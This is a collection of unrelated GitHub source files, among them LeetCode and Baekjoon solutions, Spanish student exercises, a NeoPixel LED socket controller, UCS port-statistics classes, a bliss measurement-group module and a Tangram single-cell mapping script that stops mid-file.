render_notebook\n","repo_name":"charlesdong1991/py-roughviz","sub_path":"roughviz/render/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"77"} {"seq_id":"1387186550","text":"from typing import List\n\nclass Solution:\n    def longestConsecutive(self, nums: List[int]) -> int:\n        \"\"\"Key Idea: identify non-contiguous values in L->R direction.\"\"\"\n        # Store highest span so far\n        answer = 0\n        # Gather all numbers in a set to deduplicate\n        number_set = {n for n in nums}\n        # A number with nothing to its left is the start of a sequence\n        for number in nums:\n            if number - 1 in number_set:\n                # Not a start of a sequence - pass to be consumed later\n                continue\n            else:\n                # Start of sequence - count and remove all adjacent numbers to the right\n                next = number + 1\n                span = 1\n                while next in number_set:\n                    span += 1\n                    number_set.remove(next)\n                    next += 1\n                # Update highest contiguous count\n                answer = max(answer, span)\n\n        return answer\n","repo_name":"ArchTangent-study/leetcode","sub_path":"arrays_and_hashing/longest_consecutive_sequence/128_longest_consecutive_sequence_2.py","file_name":"128_longest_consecutive_sequence_2.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"29452970799","text":"import random\n\ndef ocultar_letras(palabra, cantidad):\n    letras_ocultas = list(palabra)\n    posiciones_ocultas = random.sample(range(len(palabra)), cantidad)\n    for pos in posiciones_ocultas:\n        letras_ocultas[pos] = \"_\"\n    return \"\".join(letras_ocultas)\n\ndef revisar_letra(palabra_secreta, palabra_oculta, letra):\n    nueva_palabra_oculta = \"\"\n    for i in range(len(palabra_secreta)):\n        if palabra_secreta[i] == letra:\n            nueva_palabra_oculta += letra\n        else:\n            nueva_palabra_oculta += palabra_oculta[i]\n    return nueva_palabra_oculta\n\nif __name__ == \"__main__\":\n    palabras_secretas = [\"perro\", \"gato\", \"elefante\", \"jirafa\", \"tigre\"]\n    palabra_secreta = random.choice(palabras_secretas)\n    letras_ocultas = ocultar_letras(palabra_secreta, int(len(palabra_secreta) / 2))\n    intentos = 7\n\n    print(\"Bienvenido al juego de adivinar la palabra secreta.\")\n    print(\"La palabra secreta tiene\", len(palabra_secreta), \"letras.\")\n    print(\"Tienes 7 intentos para adivinarla.\")\n\n    while intentos > 0:\n        print(\"\\nPalabra:\", letras_ocultas)\n        print(\"Intentos restantes:\", intentos)\n        opcion = input(\"Ingresa una letra o arriésgate a decir la palabra completa: \")\n\n        if len(opcion) == 1:\n            letras_ocultas = revisar_letra(palabra_secreta, letras_ocultas, opcion)\n            if opcion not in palabra_secreta:\n                intentos -= 1\n            elif letras_ocultas == palabra_secreta:\n                # sin esta comprobación no se puede ganar adivinando letra a letra\n                print(\"¡Felicidades! Has adivinado la palabra secreta.\")\n                break\n        elif opcion == palabra_secreta:\n            print(\"¡Felicidades! Has adivinado la palabra secreta.\")\n            break\n        else:\n            intentos -= 1\n\n        if intentos == 0:\n            print(\"\\n¡Has agotado tus intentos! La palabra secreta era:\", palabra_secreta)\n\n    print(\"\\nGracias por jugar. 
¡Hasta la próxima!\")\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej1/tema4_ej1_0a695a4bdc652789c7aa1d5a0f79be1c.py","file_name":"tema4_ej1_0a695a4bdc652789c7aa1d5a0f79be1c.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71223074170","text":"''' S를 T로 변경하고자 한다면 로직을 생각하기 어렵지만, T를 S로 변경하면 쉽게 풀리는 문제이다.\n- S, T의 길이가 같을 때까지, 반복한다.\n- T의 마지막 문자열이 A이면 pop한다.\n- T의 마지막 문자열이 B이면 pop 후에, 문자열을 뒤집는다.'''\n\ns = list(input())\nt = list(input())\n\n\nwhile True:\n if len(t) == len(s):\n break\n\n if t[-1] == 'A':\n t.pop()\n\n elif t[-1] == 'B':\n t.pop()\n t.reverse()\n \n\nif t == s:\n print(1)\nelse:\n print(0)\n","repo_name":"confettimimy/Python-for-coding-test","sub_path":"그리디/[2_백준] 12904번 A와 B (거꾸로 생각하면 쉽게 풀리는 문제).py","file_name":"[2_백준] 12904번 A와 B (거꾸로 생각하면 쉽게 풀리는 문제).py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"45438215091","text":"\"\"\"\nProgram: Name Card Website\nAuthor: Subhashish Dhar\nDate: 12/10/2021\n\"\"\"\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef say_hello():\n \"\"\"renders home page\"\"\"\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"subhashish06/100_days_of_python","sub_path":"Day-56-flask_personal_site/name_card_project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10554997184","text":"\n\nclass Port:\n\n def __init__(self):\n self.name = None\n self.dn = None\n self.parent_dn = None\n self._handle = None\n self.admin_state = None\n self.max_speed = None\n self.oper_speed = None\n self.oper_state = None\n self.port_id = None\n self.peer_dn = None\n self.peer_port_id = None\n self.peer_slot_id = None\n\n def pop_base_params(self, port_data):\n self.name = port_data.name\n self.dn = port_data.dn\n self.parent_dn = port_data._ManagedObject__parent_dn\n self._handle = port_data._handle\n self.peer_dn = port_data.peer_dn\n self.admin_state = port_data.admin_state\n if getattr(port_data, 'max_speed', ''):\n self.max_speed = port_data.max_speed\n self.oper_speed = port_data.oper_speed\n self.oper_state = port_data.oper_state\n self.port_id = port_data.port_id\n if getattr(port_data, 'peer_port_id', ''):\n self.peer_port_id = port_data.peer_port_id\n if getattr(port_data, 'peer_slot_id', ''):\n self.peer_slot_id = port_data.peer_slot_id\n\n\nclass EthPortStat(Port):\n\n class EtherLoss:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.carrier_sense = data.carrier_sense\n self.carrier_sense_delta = data.carrier_sense_delta\n self.excess_collision = data.excess_collision\n self.excess_collision_delta = data.excess_collision_delta\n self.giants = data.giants\n self.giants_delta = data.giants_delta\n self.multi_collision = data.multi_collision\n self.multi_collision_delta = data.multi_collision_delta\n self.single_collision = data.single_collision\n self.single_collision_delta = data.single_collision_delta\n self.sqe_test = data.sqe_test\n self.sqe_test_delta = data.sqe_test_delta\n self.symbol = data.symbol\n self.symbol_delta = data.symbol_delta\n\n class EtherPause:\n\n def __init__(self, data):\n 
self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.recv_pause = data.recv_pause\n self.recv_pause_delta = data.recv_pause_delta\n self.resets = data.resets\n self.resets_delta = data.resets_delta\n self.xmit_pause = data.xmit_pause\n self.xmit_pause_delta = data.xmit_pause_delta\n\n class EtherErr:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.align = data.align\n self.align_delta = data.align_delta\n self.deferred_tx = data.deferred_tx\n self.deferred_tx_delta = data.deferred_tx_delta\n self.fcs = data.fcs\n self.fcs_delta = data.fcs_delta\n self.int_mac_rx = data.int_mac_rx\n self.int_mac_rx_delta = data.int_mac_rx_delta\n self.int_mac_tx = data.int_mac_tx\n self.int_mac_tx_delta = data.int_mac_tx_delta\n self.out_discard = data.out_discard\n self.out_discard_delta = data.out_discard_delta\n self.rcv = data.rcv\n self.rcv_delta = data.rcv_delta\n self.under_size = data.under_size\n self.under_size_delta = data.under_size_delta\n self.xmit = data.xmit\n self.xmit_delta = data.xmit_delta\n\n class EtherRx:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.broadcast_packets = data.broadcast_packets\n self.broadcast_packets_delta = data.broadcast_packets_delta\n self.jumbo_packets = data.jumbo_packets\n self.jumbo_packets_delta = data.jumbo_packets_delta\n self.multicast_packets = data.multicast_packets\n self.multicast_packets_delta = data.multicast_packets_delta\n self.total_bytes = data.total_bytes\n self.total_bytes_delta = data.total_bytes_delta\n self.total_packets = data.total_packets\n self.total_packets_delta = data.total_packets_delta\n self.unicast_packets = data.unicast_packets\n self.unicast_packets_delta = data.unicast_packets_delta\n\n class EtherTx:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.broadcast_packets = data.broadcast_packets\n self.broadcast_packets_delta = data.broadcast_packets_delta\n self.jumbo_packets = data.jumbo_packets\n self.jumbo_packets_delta = data.jumbo_packets_delta\n self.multicast_packets = data.multicast_packets\n self.multicast_packets_delta = data.multicast_packets_delta\n self.total_bytes = data.total_bytes\n self.total_bytes_delta = data.total_bytes_delta\n self.total_packets = data.total_packets\n self.total_packets_delta = data.total_packets_delta\n self.unicast_packets = data.unicast_packets\n self.unicast_packets_delta = data.unicast_packets_delta\n\n def __init__(self):\n super().__init__()\n self.dn = None\n self.rn = None\n self.EtherPauseStats = None\n self.EtherLossStats = None\n self.EtherErrStats = None\n self.EtherRxStats = None\n self.EtherTxStats = None\n\n def pause_stats(self, data):\n self.EtherPauseStats = self.EtherPause(data)\n\n def loss_stats(self, data):\n self.EtherLossStats = self.EtherLoss(data)\n\n def err_stats(self, data):\n self.EtherErrStats = self.EtherErr(data)\n\n def rx_stats(self, data):\n self.EtherRxStats = self.EtherRx(data)\n\n def tx_stats(self, data):\n self.EtherTxStats = self.EtherTx(data)\n\n\nclass FcPortStat(Port):\n\n class FcStat:\n def __init__(self, data):\n self.time_collected = data.time_collected\n self.bytes_rx = data.bytes_rx\n self.bytes_rx_delta = data.bytes_rx_delta\n self.bytes_tx = 
data.bytes_tx\n self.bytes_tx_delta = data.bytes_tx_delta\n self.packets_tx = data.packets_tx\n self.packets_tx_delta = data.packets_tx_delta\n self.packets_rx = data.packets_rx\n self.packets_rx_delta = data.packets_rx_delta\n\n class FcErrStat:\n def __init__(self, data):\n self.time_collected = data.time_collected\n self.crc_rx = data.crc_rx\n self.crc_rx_delta = data.crc_rx_delta\n self.discard_rx = data.discard_rx\n self.discard_rx_delta = data.discard_rx_delta\n self.discard_tx = data.discard_tx\n self.discard_tx_delta = data.discard_tx_delta\n self.link_failures = data.link_failures\n self.link_failures_delta = data.link_failures_delta\n self.rx = data.rx\n self.rx_delta = data.rx_delta\n self.signal_losses = data.signal_losses\n self.signal_losses_delta = data.signal_losses_delta\n self.sync_losses = data.sync_losses\n self.sync_losses_delta = data.sync_losses_delta\n self.too_long_rx = data.too_long_rx\n self.too_long_rx_delta = data.too_long_rx_delta\n self.too_short_rx = data.too_short_rx\n self.too_short_rx_delta = data.too_short_rx_delta\n self.tx = data.tx\n self.tx_delta = data.tx_delta\n\n def __init__(self):\n super().__init__()\n self.FcErrStats = None\n self.FcStats = None\n\n def err_stats(self, data):\n self.FcErrStats = self.FcErrStat(data)\n\n def stats(self, data):\n self.FcStats = self.FcStat(data)\n\n\nclass EthPortChannelStat(EthPortStat):\n pass\n\n\nclass FcPortChannelStat(FcPortStat):\n pass\n\n","repo_name":"ToxicSamN/pyucs","sub_path":"pyucs/statsd/portstats.py","file_name":"portstats.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16975852336","text":"class Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n maxLength = 0\n startPos = 0\n endPos = 0\n indexTable = {}\n while endPos < len(s) and startPos <= endPos:\n if s[endPos] not in indexTable or indexTable[s[endPos]] < startPos:\n indexTable[s[endPos]] = endPos\n maxLength = max(maxLength, endPos - startPos + 1)\n else:\n startPos = indexTable[s[endPos]] + 1\n maxLength = max(maxLength, endPos - startPos + 1)\n indexTable[s[endPos]] = endPos\n endPos += 1\n return maxLength\n\nsolution = Solution()\nmaxLength = solution.lengthOfLongestSubstring(\"abcabcbb\")\nprint(maxLength)\n\n\n\n","repo_name":"zzhyzzh/Leetcode","sub_path":"leetcode-algorithms/003. 
Longest Substring Without Repeating Characters/lengthOfLongestSubstring2.py","file_name":"lengthOfLongestSubstring2.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40873987139","text":"import itertools\nfrom bliss import setup_globals\nfrom bliss.config import settings\nfrom .session import get_current as _current_session\n\n\nclass _active_mg_proxy(object):\n def __getattribute__(self, attr):\n if attr == '__class__':\n return MeasurementGroup\n return getattr(get_active(), attr)\n\n def __setattr__(self, name, value):\n active = get_active()\n return setattr(active, name, value)\n \n def __repr__(self):\n return repr(get_active())\n\n\nACTIVE_MG = _active_mg_proxy()\n\n\ndef get_all():\n \"\"\"\n Return all measurement groups found in the global environment\n \"\"\"\n return [x for x in setup_globals.__dict__.values() if x != ACTIVE_MG and isinstance(x, MeasurementGroup)]\n\n\ndef get_active():\n \"\"\"\n Return the current active MeasurementGroup\n\n Get the last known active measurement group from redis,\n or get the first found in global environment (and set it as active).\n If nothing works, returns a measurement group called None,\n which does not specify any counter.\n \"\"\"\n all_mg = get_all()\n name = get_active_name()\n try:\n if name is None:\n mg = all_mg[0]\n set_active_name(mg.name)\n return mg\n else:\n for mg in all_mg:\n if name == mg.name:\n return mg\n raise IndexError\n except IndexError:\n set_active_name(None)\n return MeasurementGroup(None, { \"counters\": [] })\n\n\ndef get_active_name():\n session = _current_session()\n session_name = session.name if session is not None else 'unnamed'\n active_mg_name = settings.SimpleSetting('%s:active_measurementgroup' % session_name)\n return active_mg_name.get()\n\n\ndef set_active_name(name):\n session = _current_session()\n session_name = session.name if session is not None else 'unnamed'\n active_mg_name = settings.SimpleSetting('%s:active_measurementgroup' % \n session_name)\n if name is None:\n active_mg_name.clear()\n else:\n active_mg_name.set(name)\n\n\nclass MeasurementGroup(object):\n def __init__(self,name,config_tree):\n \"\"\"MeasurementGroup is a helper to activate detectors\n for counting procedure.\n\n name -- the measurement name\n config_tree -- measurement configuration.\n in this dictionary we need to have:\n counters -- a name list of available counters\n default -- if True set as default measurement\n \"\"\"\n counters_list = config_tree.get('counters')\n if counters_list is None:\n raise ValueError(\"MeasurementGroup: should have a counters list\")\n self.name = name\n self._available_counters = list(counters_list)\n self._current_config = settings.SimpleSetting('%s' % name,\n default_value='default')\n # disabled counters\n self._counters_settings = settings.HashSetting('%s:%s' %\n (name, self._current_config.get()))\n\n @property\n def state_names(self):\n \"\"\" list of states for this measurement\n \"\"\"\n return list((x.split(':')[-1] for x in settings.scan(match='%s:*' % self.name)))\n\n @property\n def available(self):\n \"\"\"available counters from the static config\n \"\"\"\n return self._available_counters\n\n @property\n def disable(self):\n \"\"\" disabled counters name\n \"\"\"\n return [name for name in self.available if name in self._counters_settings]\n\n @disable.setter\n def disable(self,counters):\n counter2disable = self.__counters2set(counters)\n possible2disable = 
set(self._available_counters).intersection(counter2disable)\n        unpos2disable = counter2disable.difference(possible2disable)\n        if unpos2disable:\n            raise ValueError(\"MeasurementGroup: could not disable counters (%s)\" %\n                             (','.join(unpos2disable)))\n        self._counters_settings.update(dict((name,True) for name in counter2disable))\n\n    @property\n    def enable(self):\n        \"\"\" enabled counters name\n        \"\"\"\n        return [name for name in self.available if name not in self._counters_settings]\n\n    @enable.setter\n    def enable(self,counters):\n        counters = self.__counters2set(counters)\n        possible2enable = set(self._available_counters).intersection(counters)\n        unpos2enable = counters.difference(possible2enable)\n        if unpos2enable:\n            raise ValueError(\"MeasurementGroup: could not enable counters (%s)\" %\n                             (','.join(unpos2enable)))\n\n        self._counters_settings.remove(*counters)\n\n    @property\n    def state_name(self):\n        \"\"\" current configuration name for the measurement\n        \"\"\"\n        return self._current_config.get()\n\n    def switch_state(self,name):\n        self._current_config.set(name)\n        self._counters_settings = settings.HashSetting('%s:%s' %\n                                                       (self.name,name))\n\n    def remove_states(self,*state_names):\n        \"\"\"\n        will remove one or several state(s) for this measurement\n        state_name -- the state name(s) you want to remove\n        \"\"\"\n        cnx = self._current_config._cnx()\n        names = ['%s:%s' % (self.name,name) for name in state_names]\n        cnx.delete(*names)\n\n    def copy_from_state(self,name):\n        \"\"\"\n        this will copy the configuration into the current\n        \"\"\"\n        tmp_hash = settings.HashSetting('%s:%s' % (self.name,name))\n        self._counters_settings.clear()\n        for k,v in tmp_hash.iteritems():\n            self._counters_settings[k] = v\n\n    def __counters2set(self,counters):\n        if not isinstance(counters,(tuple,list,set)):\n            counters = list((counters,))\n        return set((x.name if hasattr(x,'name') else x for x in counters))\n\n    def __repr__(self):\n        s = 'MeasurementGroup: %s (%s)\\n\\n' % (self.name,self._current_config.get())\n        enabled = list(self.enable) + ['Enabled']\n\n        max_len = max((len(x) for x in enabled))\n        str_format = ' %-' + '%ds' % max_len + ' %s\\n'\n        s += str_format % ('Enabled','Disabled')\n        s += str_format % ('-' * max_len,'-' * max_len)\n        for enable,disable in itertools.izip_longest(self.enable,\n                                                     self.disable,fillvalue=''):\n            s += str_format % (enable,disable)\n        return s\n","repo_name":"tiagocoutinho/bliss","sub_path":"bliss/common/measurementgroup.py","file_name":"measurementgroup.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"31879229695","text":"import modules.core as core\nimport modules.kubernetes as kubernetes\nimport modules.glances as glances\nimport app.utilities as utilities\nimport app.application as application\n\nslide = 0\nslides = [\n    glances.get_cpu_page,\n    glances.get_swap_memory_page,\n    glances.get_cpu_load_page,\n    core.get_temperature_page,\n    core.get_usage_page,\n    kubernetes.get_page,\n]\nmaxSlide = len(slides) - 1\n\ndef on_update(screen):\n    global slides, slide, maxSlide\n    changeSlide = int(application.get_tick() % 5) # If the number is divisible by 5 then it will be 0\n    if (changeSlide == 0):\n        if (slide < maxSlide):\n            slide = (slide + 1)\n        else:\n            slide = 0\n\n    slides[slide](screen)\n\n    utilities.log(\"Tick: \" + str(application.get_tick()))\n    utilities.log(\"Change slide: \" + str(changeSlide))\n    utilities.log(\"Slide: \" + str(slide))\n    utilities.log(\"Max Slide: \" + 
str(maxSlide))\n\n    utilities.log(\"Hostname: \" + core.get_hostname())\n    utilities.log(\"Local IP: \" + core.get_local_ip())\n    utilities.log(\"CPU Temp: \" + core.get_cpu_temperature())\n    utilities.log(\"CPU Usage: \" + core.get_cpu_useage())\n    utilities.log(\"Memory Usage: \" + core.get_memory_useage())\n\napplication.setup(on_update)","repo_name":"AceXintense/k3s-screen","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"29331896589","text":"#Aprobación De Créditos\ning = int(input(\"Indique sus ingresos: \"))\naño_nacimiento = int(input(\"Ingrese su AÑO de nacimiento: \"))\nedad = (2022-año_nacimiento)\nhijos = int(input(\"Indique su número de hijos: \"))\naños_pertenencia = int(input(\"Indique sus años de pertenencia en el banco: \"))\nestado_civil= input(\"Indique su estado civil S/C: \")\nvivienda = input(\"Indique donde vive: \\n U: Urbano \\t R: Rural :\")\n\nif años_pertenencia > 10 and hijos >= 2:\n    print(\"APROBADO\")\nelif estado_civil == \"C\" and 45 <= edad <= 55:\n    print(\"APROBADO\")\nelif ing > 2500000 and estado_civil == \"S\" and vivienda == \"U\":\n    print(\"APROBADO\")\nelif ing > 3500000 and años_pertenencia > 5:\n    print(\"APROBADO\")\nelif vivienda == \"R\" and estado_civil == \"C\" and hijos < 2:\n    print(\"APROBADO\")\nelse:\n    print(\"RECHAZADO\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_df113910acd1316e538d7f667841e910.py","file_name":"hito1_ej3_df113910acd1316e538d7f667841e910.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"23721732071","text":"import board\nimport neopixel\nimport time\nimport random\nimport argparse\nfrom datetime import datetime\nimport sys\n\nimport socket\nimport os\n\nclass Colors(object):\n    def __init__(self, speed):\n        self.NUM_LEDS = 707\n        self.pixels = neopixel.NeoPixel(board.D18, self.NUM_LEDS, brightness=0.2, auto_write=False)\n        self.wait_ms = speed\n        self.color = self.rand_color()\n        random.seed(datetime.now().timestamp())\n\n    def rand_color(self):\n        c = [\n            ((255, 255, 255)),\n            ((255,0,0)),\n            ((0,255,0)),\n            ((0,0,255)),\n            ((0,255,255)),\n            ((255,0,255)),\n            ((255,255,0))\n        ]\n        return random.choice(c)\n\n    def rings(self):\n        ring_count = int(self.NUM_LEDS/9)\n        for x in range(5):\n            for y in range(9):\n                self.pixels.fill((0, 0, 9))\n                for z in range(ring_count):\n                    self.pixels[z + (x*ring_count)] = self.color\n                self.pixels.show()\n\n    def clear(self):\n        self.color=((0,0,0))\n        self.colorWipe()\n        self.pixels.show()\n\n    def colorWipe(self):\n        for i in range(self.NUM_LEDS):\n            self.pixels[i] = self.color\n            if i%6 == 0:\n                self.pixels.show()\n\n    def blink(self):\n        for i in range(3):\n            self.pixels.fill((255, 255, 255))\n            self.pixels.show()\n            time.sleep(.5)\n            self.pixels.fill((0,0,0))\n            self.pixels.show()\n            time.sleep(.5)\n\n    def theaterChase(self):\n        for q in range(1):\n            for i in range(0, self.NUM_LEDS, 3):\n                self.pixels[i+q%2] = self.color\n                if i%4 == 0:\n                    self.pixels.show()\n                    time.sleep(self.wait_ms/1000.0)\n            for i in range(0, self.NUM_LEDS, 3):\n                self.pixels[i+q%2] = ((0,0,0))\n                if i%4 == 0:\n                    self.pixels.show()\n                    time.sleep(self.wait_ms/1000.0)\n\n    def wheel(self, pos):\n        if pos < 85:\n            return (((pos*3)&255, (255-pos*3)&255, 0))\n        elif pos < 170:\n            return (((255-pos*3)&255, 0, (pos*3)&255))\n        else:\n            pos-=170\n            return ((0, (pos*3)&255, 
(255-pos*3)&255))\n\n def rainbow(self):\n for j in range(256):\n for i in range(self.NUM_LEDS):\n if j%5 == 0:\n self.pixels[i] = self.wheel((i+j)&255)\n if j%5 == 0:\n self.pixels.show()\n\n def rainbowCycle(self):\n for j in range(2):\n for i in range(self.NUM_LEDS):\n if i%9 == 0:\n self.pixels.fill(self.wheel(int(i*256 / self.NUM_LEDS)&255))\n self.pixels.show()\n\n def rand(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = ((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))\n if i %5 == 0:\n self.pixels.show()\n\n def solid_rand(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = self.color\n if i%5 == 0:\n self.pixels.show()\n\n \n def rand_clear(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = ((0, 0, 0))\n if i %5 == 0:\n self.pixels.show()\n self.allclear()\n\n def READING(self):\n self.pixels.fill((255,0,0))\n self.pixels.show()\n\n def DONE(self):\n for i in range(3):\n self.pixels.fill((0,255,0))\n self.pixels.show()\n time.sleep(.1)\n self.pixels.fill((0,0,0))\n self.pixels.show()\n time.sleep(.1)\n\n time.sleep(0.5)\n\n def allclear(self):\n self.pixels.fill((0,0,0))\n self.pixels.show()\n\ndef run_command(command):\n data = command.lower()\n commands = data.split(\" \")\n c = None\n try:\n c = Colors(int(commands[0]))\n commands = commands[1:]\n except Exception as e:\n c = Colors(1)\n\n for action in commands:\n if action == \"blink\":\n c.blink()\n elif action == \"rings\":\n c.rings()\n elif action == \"color_wipe\":\n c.colorWipe()\n elif action == \"theater_chase\":\n c.theaterChase()\n elif action == \"rainbow\":\n c.rainbow()\n elif action == \"rainbow_cycle\":\n c.rainbowCycle()\n elif action == \"rand\":\n c.rand()\n elif action == \"solid_rand\":\n c.solid_rand()\n elif action == \"reading\":\n c.READING()\n elif action == \"done\":\n c.DONE()\n elif action == \"rand_clear\":\n c.rand_clear()\n elif action == \"allclear\":\n c.allclear()\n elif action == \"clear\":\n c.clear()\n c.allclear()\n\ndef openSocket():\n sock_path = '/home/hat/ledsock'\n try:\n os.unlink(sock_path)\n except OSError:\n if os.path.exists(sock_path):\n raise\n with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:\n s.bind(sock_path)\n s.listen(1)\n while True:\n c, a = s.accept()\n print(\"Connection made...\")\n with c:\n while True:\n data = c.recv(1024)\n if not data:\n break\n print(data)\n run_command(data.decode())\n\nif __name__ == \"__main__\":\n openSocket()\n","repo_name":"ShoolerM/HackMyHat2","sub_path":"leds.py","file_name":"leds.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14991503895","text":"# 1345. 
Jump Game IV\n# 🔴 Hard\n#\n# https://leetcode.com/problems/jump-game-iv/\n#\n# Tags: Array - Hash Table - Breadth-First Search\n\nimport json\nimport os\nimport timeit\nfrom collections import defaultdict, deque\nfrom typing import List\n\n\n# What we have is a connected undirected graph where we can use the\n# element indexes as the vertex identifiers, we want to go from 0 to n-1\n# in the minimum number of steps possible, we can use breadth-first\n# search, to prepare for it, we can first create an adjacency list,\n# each node's neighbors are the vertices before and after, and any other\n# vertices with the same value.\n#\n# Time complexity: O(n) - We have three sections that visit each element\n# on the input array and do constant work.\n# Space complexity: O(n) - There are several data structures that take\n# n memory.\n#\n# Runtime 670 ms Beats 96.59%\n# Memory 27.7 MB Beats 91.87%\nclass Solution:\n def minJumps(self, arr: List[int]) -> int:\n n = len(arr)\n # Base case.\n if n < 2:\n return 0\n # A dictionary of vertices indexed by values.\n d = defaultdict(list)\n for i in reversed(range(n)):\n d[arr[i]].append(i)\n # A function that gets all neighbors of a node that we have not\n # queued yet.\n def getUnqueuedNeighbors(i: int) -> List[int]:\n adj = []\n # We can reach the element before.\n if 0 < i and not seen[i - 1]:\n seen[i - 1] = True\n adj.append(i - 1)\n # We can reach the element after.\n if i < n - 1 and not seen[i + 1]:\n seen[i + 1] = True\n adj.append(i + 1)\n # We can also reach any element with the same value.\n if arr[i] in d:\n for node in d[arr[i]]:\n if node != i:\n adj.append(node)\n seen[node] = True\n d.pop(arr[i])\n return adj\n\n # A list of nodes that we have visited already.\n seen = [False] * n\n seen[0] = True\n # BFS starting at 0 and counting the steps until we reach n-1.\n steps, level = 0, deque([0])\n while level:\n steps += 1\n # Process an entire level.\n for _ in range(len(level)):\n current = level.popleft()\n for nei in getUnqueuedNeighbors(current):\n # If this is the target node, return.\n if nei == n - 1:\n return steps\n level.append(nei)\n raise Exception(\"Unreachable code\")\n\n\ndef test():\n executors = [Solution]\n # The tests are big, use a separate JSON file.\n __location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__))\n )\n with open(os.path.join(__location__, \"jump-game-iv.json\")) as json_file:\n tests = json.load(json_file)\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.minJumps(t[\"arr\"])\n exp = t[\"res\"]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/jump-game-iv.py","file_name":"jump-game-iv.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4917031456","text":"import numpy as np\nimport pandas as pd\nimport scanpy as sc\nimport tangram as tg\nfrom pathlib import Path\n\nPath(\"data/ad_maps/SlideSeq\").mkdir(parents=True, exist_ok=True)\nPath(\"data/ad_maps/STARmap\").mkdir(parents=True, exist_ok=True)\n\n# we follow the Tangram 
Tutorial without squidpy\n\n##### Load the spatial data: Slide-seq data, 9852 spatial voxels, 24518 genes\nprint('Reading SlideSeq spatial data ...')\nad_sp = sc.read_h5ad('data/slideseq_MOp_1217.h5ad')\nprint(ad_sp)\n\n##### Load single cell data, MOp 10Xv3 dataset, 26431 profiled cells with 27742 genes\nprint('Reading MOp 10Xv3 single cell data ...')\nad_sc = sc.read_h5ad('data/mop_sn_tutorial.h5ad')\nprint(ad_sc)\n# normalize the number of counts within each cell to a fixed number\nprint('Normalizing counts ...')\nsc.pp.normalize_total(ad_sc)\n\n##### Prepare to map\nprint('Reading marker genes ...')\ndf_genes = pd.read_csv('data/MOp_markers.csv', index_col=0)\nmarkers = np.reshape(df_genes.values, (-1, ))\nmarkers = list(markers)\nprint(len(markers))\nprint('Preparing for mapping ...')\ntg.pp_adatas(ad_sc, ad_sp, genes=markers)\n\n##### Map\nprint('Mapping single cells onto space ...')\nfor i in range(9):\n # either using cpu or using GPU, I strongly recommend GPU, either from the server or from Google Collab\n ad_map = tg.map_cells_to_space(\n adata_sc=ad_sc,\n adata_sp=ad_sp,\n #device='cpu',\n device='cuda:0',\n )\n print('Saving map')\n ad_map.write(filename=f'data/ad_maps/SlideSeq/ad_map{i}.h5ad')\n\n##### Load the spatial data: STARmap 1549 voxels with 1020 genes\nprint('Reading STARmap spatial data 